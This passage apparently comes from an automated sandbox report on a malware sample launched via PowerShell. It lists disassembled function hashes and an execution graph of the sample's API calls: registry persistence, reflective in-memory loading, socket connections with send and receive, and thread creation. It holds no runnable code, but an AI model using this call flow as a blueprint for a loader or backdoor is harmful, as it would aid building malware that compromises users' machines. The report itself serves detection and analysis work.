                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: tM7l$`_q$`_q$`_q$`_q
                                                                                                                            • API String ID: 0-3828439082
                                                                                                                            • Opcode ID: 21984b1ee9182134096f580a531764a8cdb14ff34b6a6d308b8d5f6fd594aa4b
                                                                                                                            • Instruction ID: 218d0b295cac4324a3dbe136f56e27b8f83e1be136e96cd9be0221124f26db09
                                                                                                                            • Opcode Fuzzy Hash: 21984b1ee9182134096f580a531764a8cdb14ff34b6a6d308b8d5f6fd594aa4b
                                                                                                                            • Instruction Fuzzy Hash: 45B1A774E002099FCB55DFA9D990A9DFBF2FF88304F14862AE419AB315DB34A945CF90
                                                                                                                            Function 00C67A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: tM7l$`_q$`_q$`_q$`_q
                                                                                                                            • API String ID: 0-3828439082
                                                                                                                            • Opcode ID: 676846dfb9dea810aeb1c06148eae981379ca1e37474253f67fec907c1a1767d
                                                                                                                            • Instruction ID: ef88bea827635fa0907a4f39ec6d77adce17cc8eb9dc077c7088223b7837aa2a
                                                                                                                            • Opcode Fuzzy Hash: 676846dfb9dea810aeb1c06148eae981379ca1e37474253f67fec907c1a1767d
                                                                                                                            • Instruction Fuzzy Hash: A4B19774E002099FCB54DFA9D980A9DFBF2FF88304F14862AE419AB315DB70A945CF90
                                                                                                                            Function 00C6EDD8 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `Q^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-2499013975
                                                                                                                            • Opcode ID: 88ef4a2a43d733a0651f498125fd515ad1a508cf43ba84d33a28df17b77e8d39
                                                                                                                            • Instruction ID: a1eb0f6b7d4541aa972eea421827e8207950911ad8791b8d8e73847d9ef666c7
                                                                                                                            • Opcode Fuzzy Hash: 88ef4a2a43d733a0651f498125fd515ad1a508cf43ba84d33a28df17b77e8d39
                                                                                                                            • Instruction Fuzzy Hash: 2DE104347401108FCB389B79A59462E77D7AFC9B10B2444BED902CF3A9EE75DD428B92
                                                                                                                            Function 00C64C62 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: q^$q^$q^$q^
                                                                                                                            • API String ID: 0-1645595170
                                                                                                                            • Opcode ID: 88f5ac513b270bdcba8ce6f7e57d39a7cff0a66573299ae1b5fc832843e19d89
                                                                                                                            • Instruction ID: 36405c8f290fca8ff8383aa370b49cbec228907e95881be32a898ba7b8387018
                                                                                                                            • Opcode Fuzzy Hash: 88f5ac513b270bdcba8ce6f7e57d39a7cff0a66573299ae1b5fc832843e19d89
                                                                                                                            • Instruction Fuzzy Hash: EE317B1250E3E11FD30BAB3D98B45917FB1AE57268B1A44DBC0C5CF0A3D818599ED3AB
                                                                                                                            Function 070A5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-2125118731
                                                                                                                            • Opcode ID: de9fadbb5b74beebe3b5a19a3b46bb6cfe9f0786056621ca261f898515e3a0b5
                                                                                                                            • Instruction ID: 2107df04f73286083d328739f3bc71501ff4160a63dde83dc455de8727712d0e
                                                                                                                            • Opcode Fuzzy Hash: de9fadbb5b74beebe3b5a19a3b46bb6cfe9f0786056621ca261f898515e3a0b5
                                                                                                                            • Instruction Fuzzy Hash: 12214971700356ABDB7855BA9C00B2FB7D67BC0711F24852AE506EB385DD36C8548761
                                                                                                                            Function 070A0309 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                            • API String ID: 0-2049395529
                                                                                                                            • Opcode ID: cac650d889536bd66b70a5c92ce9bb7b2e7e4065983e20ad0508afd0010a2b2c
                                                                                                                            • Instruction ID: 5fe5cc9458f9ae8487ca73f8fd2b490d90a254f2ee1b5e5fff5b675eb946652e
                                                                                                                            • Opcode Fuzzy Hash: cac650d889536bd66b70a5c92ce9bb7b2e7e4065983e20ad0508afd0010a2b2c
                                                                                                                            • Instruction Fuzzy Hash: 5001A261B0D39A5FC76B12B818201556FF65FC3940B2A86D7C181CF3ABEE158D4E83A7
                                                                                                                            Function 070A2107 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q$J8l$J8l
                                                                                                                            • API String ID: 0-1806373838
                                                                                                                            • Opcode ID: ae0702d1f9ced9a33c5d88fbc35b805780c7a58ee8abbc847b790a6b7321b9cb
                                                                                                                            • Instruction ID: aa573a7b47bdb73c2d2681935720a882f0c53fe2ef903f741bc2dd1d870e4b10
                                                                                                                            • Opcode Fuzzy Hash: ae0702d1f9ced9a33c5d88fbc35b805780c7a58ee8abbc847b790a6b7321b9cb
                                                                                                                            • Instruction Fuzzy Hash: 7101D47660E3855FC32742685C20456BFB66FD3A10F1A46E7C280DF36BCA298C09C762

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0.3%
                                                                                                                            Total number of Nodes:604
                                                                                                                            Total number of Limit Nodes:20
                                                                                                                            execution_graph 43368 2c332e0 6 API calls 43369 2c32d80 ResetEvent InterlockedExchange timeGetTime socket 43370 2c32de8 43369->43370 43371 2c32dfc lstrlenW WideCharToMultiByte 43369->43371 43423 2c36815 43370->43423 43390 2c367ff 43371->43390 43374 2c32df6 43376 2c32e59 ctype 43377 2c32e60 htons connect 43376->43377 43378 2c32e96 43376->43378 43377->43378 43379 2c32eab setsockopt setsockopt setsockopt setsockopt 43377->43379 43380 2c36815 __cftog_l 5 API calls 43378->43380 43382 2c32f52 InterlockedExchange 43379->43382 43383 2c32f24 WSAIoctl 43379->43383 43381 2c32ea5 43380->43381 43402 2c3721b 43382->43402 43383->43382 43386 2c3721b 755 API calls 43387 2c32f91 43386->43387 43388 2c36815 __cftog_l 5 API calls 43387->43388 43389 2c32fa6 43388->43389 43391 2c36f17 43390->43391 43393 2c32e22 lstrlenW WideCharToMultiByte gethostbyname 43391->43393 43397 2c36f3d std::exception::exception 43391->43397 43431 2c36e83 43391->43431 43448 2c38550 DecodePointer 43391->43448 43393->43376 43395 2c36f7b 43450 2c36e24 66 API calls std::exception::operator= 43395->43450 43397->43395 43449 2c373e9 76 API calls __cinit 43397->43449 43398 2c36f85 43451 2c37836 RaiseException 43398->43451 43401 2c36f96 43403 2c3722b 43402->43403 43404 2c3723f 43402->43404 43487 2c3710d 66 API calls __getptd_noexit 43403->43487 43460 2c39754 TlsGetValue 43404->43460 43407 2c37230 43488 2c38702 11 API calls __wctomb_s_l 43407->43488 43412 2c32f79 43412->43386 43413 2c372a2 43489 2c36e49 66 API calls 2 library calls 43413->43489 43417 2c372a8 43417->43412 43490 2c37133 66 API calls 3 library calls 43417->43490 43419 2c37267 CreateThread 43419->43412 43422 2c3729a GetLastError 43419->43422 43548 2c371b6 43419->43548 43422->43413 43424 2c3681f IsDebuggerPresent 43423->43424 43425 2c3681d 43423->43425 43935 2c3b5e6 43424->43935 43425->43374 43428 2c3794f SetUnhandledExceptionFilter UnhandledExceptionFilter 43429 2c37974 GetCurrentProcess TerminateProcess 43428->43429 43430 2c3796c __call_reportfault 43428->43430 43429->43374 43430->43429 43432 2c36f00 43431->43432 43435 2c36e91 43431->43435 43458 2c38550 DecodePointer 43432->43458 43434 2c36f06 43459 2c3710d 66 API calls __getptd_noexit 43434->43459 43438 2c36ebf RtlAllocateHeap 43435->43438 43441 2c36e9c 43435->43441 43442 2c36eec 43435->43442 43446 2c36eea 43435->43446 43455 2c38550 DecodePointer 43435->43455 43438->43435 43439 2c36ef8 43438->43439 43439->43391 43441->43435 43452 2c38508 66 API calls __NMSG_WRITE 43441->43452 43453 2c38359 66 API calls 6 library calls 43441->43453 43454 2c38098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 43441->43454 43456 2c3710d 66 API calls __getptd_noexit 43442->43456 43457 2c3710d 66 API calls __getptd_noexit 43446->43457 43448->43391 43449->43395 43450->43398 43451->43401 43452->43441 43453->43441 43455->43435 43456->43446 43457->43439 43458->43434 43459->43439 43461 2c37245 43460->43461 43462 2c39769 DecodePointer TlsSetValue 43460->43462 43463 2c39fe4 43461->43463 43462->43461 43465 2c39fed 43463->43465 43466 2c37251 43465->43466 43467 2c3a00b Sleep 43465->43467 43491 2c3e555 43465->43491 43466->43413 43469 2c3990f 43466->43469 43468 2c3a020 43467->43468 43468->43465 43468->43466 43502 2c39896 GetLastError 43469->43502 43471 2c39917 43472 2c3725e 43471->43472 43516 2c38315 66 API calls 3 library calls 43471->43516 43474 2c397e2 43472->43474 43518 2c39db0 43474->43518 43476 2c397ee GetModuleHandleW 43519 2c3c144 43476->43519 43478 2c3982c InterlockedIncrement 43526 2c39884 43478->43526 43481 2c3c144 __lock 64 API calls 43482 2c3984d 43481->43482 43529 2c3de7f InterlockedIncrement 43482->43529 43484 2c3986b 43541 2c3988d 43484->43541 43486 2c39878 __commit 43486->43419 43487->43407 43488->43412 43489->43417 43490->43412 43492 2c3e561 43491->43492 43498 2c3e57c 43491->43498 43493 2c3e56d 43492->43493 43492->43498 43500 2c3710d 66 API calls __getptd_noexit 43493->43500 43495 2c3e58f HeapAlloc 43497 2c3e5b6 43495->43497 43495->43498 43496 2c3e572 43496->43465 43497->43465 43498->43495 43498->43497 43501 2c38550 DecodePointer 43498->43501 43500->43496 43501->43498 43503 2c39754 ___set_flsgetvalue 3 API calls 43502->43503 43504 2c398ad 43503->43504 43505 2c39903 SetLastError 43504->43505 43506 2c39fe4 __calloc_crt 62 API calls 43504->43506 43505->43471 43507 2c398c1 43506->43507 43507->43505 43508 2c398c9 DecodePointer 43507->43508 43509 2c398de 43508->43509 43510 2c398e2 43509->43510 43511 2c398fa 43509->43511 43513 2c397e2 __CRT_INIT@12 62 API calls 43510->43513 43517 2c36e49 66 API calls 2 library calls 43511->43517 43514 2c398ea GetCurrentThreadId 43513->43514 43514->43505 43515 2c39900 43515->43505 43517->43515 43518->43476 43520 2c3c159 43519->43520 43521 2c3c16c EnterCriticalSection 43519->43521 43544 2c3c082 66 API calls 8 library calls 43520->43544 43521->43478 43523 2c3c15f 43523->43521 43545 2c38315 66 API calls 3 library calls 43523->43545 43546 2c3c06b LeaveCriticalSection 43526->43546 43528 2c39846 43528->43481 43530 2c3dea0 43529->43530 43531 2c3de9d InterlockedIncrement 43529->43531 43532 2c3deaa InterlockedIncrement 43530->43532 43533 2c3dead 43530->43533 43531->43530 43532->43533 43534 2c3deb7 InterlockedIncrement 43533->43534 43535 2c3deba 43533->43535 43534->43535 43536 2c3dec4 InterlockedIncrement 43535->43536 43538 2c3dec7 43535->43538 43536->43538 43537 2c3dee0 InterlockedIncrement 43537->43538 43538->43537 43539 2c3def0 InterlockedIncrement 43538->43539 43540 2c3defb InterlockedIncrement 43538->43540 43539->43538 43540->43484 43547 2c3c06b LeaveCriticalSection 43541->43547 43543 2c39894 43543->43486 43544->43523 43546->43528 43547->43543 43549 2c39754 ___set_flsgetvalue 3 API calls 43548->43549 43550 2c371c1 43549->43550 43563 2c39734 TlsGetValue 43550->43563 43553 2c371d0 43614 2c39788 DecodePointer 43553->43614 43554 2c371fa 43565 2c39929 43554->43565 43556 2c37215 43601 2c37175 43556->43601 43559 2c371df 43561 2c371e3 GetLastError ExitThread 43559->43561 43562 2c371f0 GetCurrentThreadId 43559->43562 43562->43556 43564 2c371cc 43563->43564 43564->43553 43564->43554 43566 2c39935 __commit 43565->43566 43567 2c3994d 43566->43567 43598 2c39a37 __commit 43566->43598 43615 2c36e49 66 API calls 2 library calls 43566->43615 43568 2c3995b 43567->43568 43616 2c36e49 66 API calls 2 library calls 43567->43616 43571 2c39969 43568->43571 43617 2c36e49 66 API calls 2 library calls 43568->43617 43573 2c39977 43571->43573 43618 2c36e49 66 API calls 2 library calls 43571->43618 43575 2c39985 43573->43575 43619 2c36e49 66 API calls 2 library calls 43573->43619 43576 2c39993 43575->43576 43620 2c36e49 66 API calls 2 library calls 43575->43620 43579 2c399a1 43576->43579 43621 2c36e49 66 API calls 2 library calls 43576->43621 43581 2c399b2 43579->43581 43622 2c36e49 66 API calls 2 library calls 43579->43622 43583 2c3c144 __lock 66 API calls 43581->43583 43584 2c399ba 43583->43584 43585 2c399df 43584->43585 43586 2c399c6 InterlockedDecrement 43584->43586 43624 2c39a43 LeaveCriticalSection _doexit 43585->43624 43586->43585 43587 2c399d1 43586->43587 43587->43585 43623 2c36e49 66 API calls 2 library calls 43587->43623 43589 2c399ec 43591 2c3c144 __lock 66 API calls 43589->43591 43592 2c399f3 43591->43592 43593 2c39a24 43592->43593 43625 2c3df0e 8 API calls 43592->43625 43627 2c39a4f LeaveCriticalSection _doexit 43593->43627 43596 2c39a31 43628 2c36e49 66 API calls 2 library calls 43596->43628 43598->43556 43599 2c39a08 43599->43593 43626 2c3dfa7 66 API calls 4 library calls 43599->43626 43602 2c37181 __commit 43601->43602 43603 2c3990f __getptd 66 API calls 43602->43603 43604 2c37186 43603->43604 43629 2c352d9 43604->43629 43640 2c32fb0 43604->43640 43650 2c352b0 43604->43650 43661 2c330c0 43604->43661 43605 2c37190 43666 2c37156 43605->43666 43607 2c37196 43608 2c39c41 __XcptFilter 66 API calls 43607->43608 43609 2c371a7 43608->43609 43614->43559 43615->43567 43616->43568 43617->43571 43618->43573 43619->43575 43620->43576 43621->43579 43622->43581 43623->43585 43624->43589 43625->43599 43626->43593 43627->43596 43628->43598 43630 2c352d2 43629->43630 43631 2c3536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 43630->43631 43632 2c353ca 43631->43632 43633 2c3543c 43631->43633 43636 2c35403 OpenProcess 43632->43636 43638 2c3542f Sleep 43632->43638 43677 2c35820 105 API calls 2 library calls 43632->43677 43672 34a0497 43633->43672 43636->43632 43637 2c35415 GetExitCodeProcess 43636->43637 43637->43632 43638->43636 43641 2c367ff 77 API calls 43640->43641 43647 2c32fd3 43641->43647 43642 2c3306d 43644 2c36815 __cftog_l 5 API calls 43642->43644 43643 2c33014 select 43643->43642 43643->43647 43646 2c33098 43644->43646 43645 2c33032 recv 43645->43647 43646->43605 43647->43642 43647->43643 43647->43645 43649 2c3710d 66 API calls __wctomb_s_l 43647->43649 43851 2c33350 43647->43851 43649->43647 43651 2c3536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 43650->43651 43658 2c352cc 43650->43658 43652 2c353ca 43651->43652 43653 2c3543c 43651->43653 43656 2c35403 OpenProcess 43652->43656 43659 2c3542f Sleep 43652->43659 43933 2c35820 105 API calls 2 library calls 43652->43933 43660 34a0497 583 API calls 43653->43660 43655 2c35442 43655->43605 43656->43652 43657 2c35415 GetExitCodeProcess 43656->43657 43657->43652 43658->43651 43659->43656 43660->43655 43662 2c33128 43661->43662 43664 2c330d4 43661->43664 43662->43605 43663 2c330e8 Sleep 43663->43664 43664->43662 43664->43663 43665 2c33104 timeGetTime 43664->43665 43665->43664 43667 2c39896 __getptd_noexit 66 API calls 43666->43667 43668 2c37160 43667->43668 43669 2c3716b ExitThread 43668->43669 43934 2c39a58 79 API calls __freefls@4 43668->43934 43671 2c3716a 43671->43669 43678 34a00cd GetPEB 43672->43678 43674 34a04a8 43676 2c35442 43674->43676 43680 34a01cb 43674->43680 43676->43605 43677->43632 43679 34a00e5 43678->43679 43679->43674 43681 34a01df 43680->43681 43682 34a01e6 43680->43682 43681->43676 43682->43681 43683 34a021e VirtualAlloc 43682->43683 43683->43681 43686 34a0238 43683->43686 43684 34a03a3 43684->43681 43688 36311f2 43684->43688 43685 34a0330 LoadLibraryA 43685->43681 43685->43686 43686->43684 43686->43685 43689 3631202 43688->43689 43690 36311fd 43688->43690 43694 36310fc 43689->43694 43706 3638262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43690->43706 43693 3631210 43693->43681 43695 3631108 ___lock_fhandle 43694->43695 43696 3631155 43695->43696 43703 36311a5 ___lock_fhandle 43695->43703 43707 3630f98 43695->43707 43696->43703 43759 362e480 43696->43759 43700 3631185 43701 3630f98 __CRT_INIT@12 149 API calls 43700->43701 43700->43703 43701->43703 43702 362e480 ___DllMainCRTStartup 526 API calls 43704 363117c 43702->43704 43703->43693 43705 3630f98 __CRT_INIT@12 149 API calls 43704->43705 43705->43700 43706->43689 43708 3630fa4 ___lock_fhandle 43707->43708 43709 3631026 43708->43709 43710 3630fac 43708->43710 43712 3631087 43709->43712 43713 363102c 43709->43713 43763 3631a1b HeapCreate 43710->43763 43714 36310e5 43712->43714 43715 363108c 43712->43715 43719 363104a 43713->43719 43727 3630fb5 ___lock_fhandle 43713->43727 43773 3631ce6 66 API calls _doexit 43713->43773 43714->43727 43806 3633fa6 79 API calls __freefls@4 43714->43806 43778 3633ca0 TlsGetValue 43715->43778 43716 3630fb1 43718 3630fbc 43716->43718 43716->43727 43764 3634014 86 API calls 5 library calls 43718->43764 43724 363105e 43719->43724 43774 3637dfb 67 API calls _free 43719->43774 43777 3631071 70 API calls __mtterm 43724->43777 43727->43696 43729 3630fc1 __RTC_Initialize 43732 3630fc5 43729->43732 43738 3630fd1 GetCommandLineA 43729->43738 43730 3631054 43775 3633cf1 70 API calls _free 43730->43775 43765 3631a39 HeapDestroy 43732->43765 43735 36310a9 DecodePointer 43739 36310be 43735->43739 43736 3630fca 43736->43727 43737 3631059 43776 3631a39 HeapDestroy 43737->43776 43766 363817f 71 API calls 2 library calls 43738->43766 43742 36310c2 43739->43742 43743 36310d9 43739->43743 43787 3633d2e 43742->43787 43800 362f639 43743->43800 43744 3630fe1 43767 3637bb6 73 API calls __calloc_crt 43744->43767 43748 36310c9 GetCurrentThreadId 43748->43727 43749 3630feb 43750 3630fef 43749->43750 43769 36380c4 95 API calls 3 library calls 43749->43769 43768 3633cf1 70 API calls _free 43750->43768 43753 3630ffb 43754 363100f 43753->43754 43770 3637e4e 94 API calls 6 library calls 43753->43770 43754->43736 43772 3637dfb 67 API calls _free 43754->43772 43757 3631004 43757->43754 43771 3631af9 77 API calls 4 library calls 43757->43771 43760 362e489 43759->43760 43761 362e4af 43759->43761 43760->43761 43762 362e491 CreateThread WaitForSingleObject 43760->43762 43761->43700 43761->43702 43762->43761 43807 362df10 43762->43807 43763->43716 43764->43729 43765->43736 43766->43744 43767->43749 43768->43732 43769->43753 43770->43757 43771->43754 43772->43750 43773->43719 43774->43730 43775->43737 43776->43724 43777->43727 43779 3631091 43778->43779 43780 3633cb5 DecodePointer TlsSetValue 43778->43780 43781 3634534 43779->43781 43780->43779 43783 363453d 43781->43783 43782 363a6f2 __calloc_crt 65 API calls 43782->43783 43783->43782 43784 363109d 43783->43784 43785 363455b Sleep 43783->43785 43784->43727 43784->43735 43786 3634570 43785->43786 43786->43783 43786->43784 43788 3634300 ___lock_fhandle 43787->43788 43789 3633d3a GetModuleHandleW 43788->43789 43790 3638e5b __lock 64 API calls 43789->43790 43791 3633d78 InterlockedIncrement 43790->43791 43792 3633dd0 __getptd_noexit LeaveCriticalSection 43791->43792 43793 3633d92 43792->43793 43794 3638e5b __lock 64 API calls 43793->43794 43795 3633d99 43794->43795 43796 3634d46 ___addlocaleref 8 API calls 43795->43796 43797 3633db7 43796->43797 43798 3633dd9 __getptd_noexit LeaveCriticalSection 43797->43798 43799 3633dc4 ___lock_fhandle 43798->43799 43799->43748 43801 362f644 RtlFreeHeap 43800->43801 43805 362f66d _free 43800->43805 43802 362f659 43801->43802 43801->43805 43803 362f91b _free 64 API calls 43802->43803 43804 362f65f GetLastError 43803->43804 43804->43805 43805->43727 43806->43727 43808 3630542 67 API calls 43807->43808 43809 362df5a Sleep 43808->43809 43810 362df97 43809->43810 43811 362df74 43809->43811 43813 362dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 43810->43813 43814 362df9f 43810->43814 43812 362f707 77 API calls 43811->43812 43815 362df7b 43812->43815 43817 362fa29 289 API calls 43813->43817 43816 3627620 14 API calls 43814->43816 43819 362fa29 289 API calls 43815->43819 43816->43813 43818 362e003 CloseHandle 43817->43818 43820 362f707 77 API calls 43818->43820 43821 362df8d CloseHandle 43819->43821 43822 362e014 43820->43822 43821->43810 43823 362e022 43822->43823 43824 3622c90 8 API calls 43822->43824 43825 362f707 77 API calls 43823->43825 43824->43823 43826 362e036 43825->43826 43827 3629730 80 API calls 43826->43827 43831 362e04e 43826->43831 43827->43831 43828 362f876 66 API calls __NMSG_WRITE 43828->43831 43829 362e189 EnumWindows 43830 362e1a5 Sleep EnumWindows 43829->43830 43829->43831 43830->43830 43830->43831 43831->43828 43831->43829 43832 362e1f0 Sleep 43831->43832 43833 3630542 67 API calls 43831->43833 43834 362e239 CreateEventA 43831->43834 43850 3622da0 306 API calls 43831->43850 43832->43831 43833->43831 43835 362f876 __NMSG_WRITE 66 API calls 43834->43835 43840 362e281 43835->43840 43836 362ca70 113 API calls 43836->43840 43837 362e2bf Sleep RegOpenKeyExW 43839 362e2f5 RegQueryValueExW 43837->43839 43837->43840 43838 3625430 268 API calls 43838->43840 43839->43840 43840->43836 43840->43837 43840->43838 43844 362e339 43840->43844 43841 362e345 CloseHandle 43841->43831 43842 362fa29 289 API calls 43842->43844 43843 362e39f Sleep 43843->43844 43844->43841 43844->43842 43844->43843 43845 362e422 WaitForSingleObject CloseHandle 43844->43845 43846 3630542 67 API calls 43844->43846 43847 362e3dd Sleep CloseHandle 43844->43847 43848 362e3cd WaitForSingleObject CloseHandle 43844->43848 43845->43844 43849 362e43c Sleep CloseHandle 43846->43849 43847->43831 43848->43847 43849->43831 43850->43831 43852 2c33366 43851->43852 43863 2c31100 43852->43863 43854 2c334e1 43854->43647 43855 2c334c6 43856 2c311b0 70 API calls 43855->43856 43857 2c334d8 43856->43857 43857->43647 43858 2c33403 timeGetTime 43871 2c311b0 43858->43871 43860 2c33378 _memmove 43860->43854 43860->43855 43860->43858 43861 2c311b0 70 API calls 43860->43861 43880 2c354c0 43860->43880 43861->43860 43864 2c31111 43863->43864 43865 2c3110b 43863->43865 43912 2c36ba0 43864->43912 43865->43860 43867 2c31134 VirtualAlloc 43868 2c3116f 43867->43868 43869 2c3118a VirtualFree 43868->43869 43870 2c31198 43868->43870 43869->43870 43870->43860 43872 2c311bd 43871->43872 43873 2c311c6 43872->43873 43874 2c36ba0 __floor_pentium4 68 API calls 43872->43874 43873->43860 43875 2c311ee 43874->43875 43876 2c31214 43875->43876 43877 2c3121b VirtualAlloc 43875->43877 43876->43860 43878 2c31236 43877->43878 43879 2c31247 VirtualFree 43878->43879 43879->43860 43881 2c354dc 43880->43881 43905 2c3580d 43880->43905 43882 2c35707 VirtualAlloc 43881->43882 43883 2c354e7 RegOpenKeyExW 43881->43883 43884 2c35745 43882->43884 43885 2c35515 RegQueryValueExW 43883->43885 43889 2c355ba 43883->43889 43888 2c367ff 77 API calls 43884->43888 43886 2c3553a 43885->43886 43887 2c355ad RegCloseKey 43885->43887 43890 2c367ff 77 API calls 43886->43890 43887->43889 43891 2c35758 43888->43891 43893 2c356f8 43889->43893 43894 2c355f5 43889->43894 43892 2c35540 _memset 43890->43892 43891->43893 43899 2c35788 RegCreateKeyW 43891->43899 43896 2c3554d RegQueryValueExW 43892->43896 43900 2c3721b 743 API calls 43893->43900 43895 2c355fe VirtualFree 43894->43895 43906 2c35611 _memset 43894->43906 43895->43906 43897 2c355aa 43896->43897 43898 2c35569 VirtualAlloc 43896->43898 43897->43887 43901 2c355a5 43898->43901 43902 2c357a3 RegDeleteValueW RegSetValueExW 43899->43902 43903 2c357ca RegCloseKey 43899->43903 43904 2c357f3 Sleep 43900->43904 43901->43897 43902->43903 43903->43893 43930 2c32d10 43904->43930 43905->43860 43907 2c367ff 77 API calls 43906->43907 43909 2c356b1 43907->43909 43908 2c356e6 ctype 43908->43860 43909->43908 43926 2c360df 43909->43926 43913 2c36bad 43912->43913 43918 2c37d77 __ctrlfp __floor_pentium4 43912->43918 43914 2c36bde 43913->43914 43913->43918 43915 2c36c28 43914->43915 43923 2c37a9b 67 API calls __wctomb_s_l 43914->43923 43915->43867 43916 2c37dd2 __ctrlfp 43916->43867 43917 2c37de5 __floor_pentium4 43917->43916 43925 2c3bc80 67 API calls 6 library calls 43917->43925 43918->43916 43918->43917 43921 2c37dc2 43918->43921 43924 2c3bc2b 66 API calls 3 library calls 43921->43924 43923->43915 43924->43916 43925->43916 43927 2c360e5 43926->43927 43928 2c311b0 70 API calls 43927->43928 43929 2c4fab1 GetCurrentThreadId 43928->43929 43931 2c32d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 43930->43931 43932 2c32d70 43930->43932 43931->43932 43932->43905 43933->43652 43934->43671 43935->43428 43936 2c33200 Sleep 43937 2c50254 43936->43937 43938 2c4f927 43939 2c4fb9a 43938->43939 43943 2c360df 71 API calls 43939->43943 43944 2c4f997 43939->43944 43948 2c35ef8 43939->43948 43940 2c4fb9c 43943->43940 43946 2c35f68 43944->43946 43945 2c31100 70 API calls 43945->43946 43946->43945 43947 2c4f9b7 43946->43947 43949 2c35f68 43948->43949 43950 2c31100 70 API calls 43949->43950 43951 2c4f9b7 43949->43951 43950->43949 43952 2c35e07 43953 2c4f0f9 RegQueryValueExW 43952->43953 43954 2c33f35 __wcsrev 43953->43954 43955 2c3638b 43956 2c31100 70 API calls 43955->43956 43957 2c36390 43956->43957 43958 2c3608a 43959 2c360a0 RegOpenKeyExW 43958->43959 43960 2c33f35 __wcsrev 43959->43960 43961 2c3474c lstrlenW 43962 2c4fff8 43961->43962 43963 2c35eb2 Sleep 43966 2c36f17 43963->43966 43968 2c36f21 43966->43968 43967 2c36e83 _malloc 66 API calls 43967->43968 43968->43967 43969 2c35ec9 43968->43969 43973 2c36f3d std::exception::exception 43968->43973 43978 2c38550 DecodePointer 43968->43978 43971 2c36f7b 43980 2c36e24 66 API calls std::exception::operator= 43971->43980 43973->43971 43979 2c373e9 76 API calls __cinit 43973->43979 43974 2c36f85 43981 2c37836 RaiseException 43974->43981 43977 2c36f96 43978->43968 43979->43971 43980->43974 43981->43977 43982 2c34274 43983 2c4f814 CreateThread 43982->43983 43985 2c36110 43983->43985 43985->43985 43986 2c4f63d send 43987 2880032 43998 2880ae4 GetPEB 43987->43998 43990 2880ae4 GetPEB 43993 28802a7 43990->43993 43991 28804a6 GetNativeSystemInfo 43992 28804d3 VirtualAlloc 43991->43992 43996 2880a02 43991->43996 43994 28804ec VirtualAlloc 43992->43994 43995 28804ff 43992->43995 43993->43991 43993->43996 43994->43995 44000 2c37813 43995->44000 43999 288029b 43998->43999 43999->43990 44001 2c37823 44000->44001 44002 2c3781e 44000->44002 44006 2c3771d 44001->44006 44014 2c3b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 44002->44014 44005 2c37831 44005->43996 44007 2c37729 __commit 44006->44007 44008 2c377c6 __commit 44007->44008 44010 2c37776 44007->44010 44015 2c375b9 44007->44015 44008->44005 44010->44008 44012 2c375b9 __CRT_INIT@12 149 